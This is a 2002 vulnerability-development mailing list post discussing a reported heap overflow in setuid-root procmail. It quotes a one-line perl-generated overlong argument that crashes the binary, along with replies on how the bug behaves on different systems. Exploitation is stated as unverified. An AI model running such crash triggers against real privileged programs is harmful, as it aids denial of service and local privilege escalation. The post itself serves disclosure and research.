Vulnerability Development mailing list archives

Re: procmail heap overflow


From: SpaceWalker <spacewalker () altern org>
Date: Wed, 19 Jun 2002 10:03:45 +0200

$ procmail -v
procmail v3.15.1 2001/01/08
$ procmail `perl -e '{print "A"x10240}'`=A
waits indefinitely
Doesn't seem to segfault on my system, I'm running base slackware 8 on x86.

On Wed, 19 Jun 2002 02:38:08 +0200
flatline <flatline () blackhat nl> wrote:

hi,

i found a heap overflow in procmail (up until latest) some time ago.

flatline@intra:/usr/bin$ ls -la procmail
-rwsr-xr-x    1 root     mail        64344 Jun  3  2001 procmail*
flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
procmail: Exceeded LINEBUF
Segmentation fault
flatline@intra:/usr/bin$

at first it seemed to properly drop privs before segging, but not too long 
ago i managed to make it crash while it still had euid 0.
segfaults have been seen on red hat/slackware linux and bsd variants. 
successful exploitation has not been verified.

/ flatline

greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone 
who felt left out.
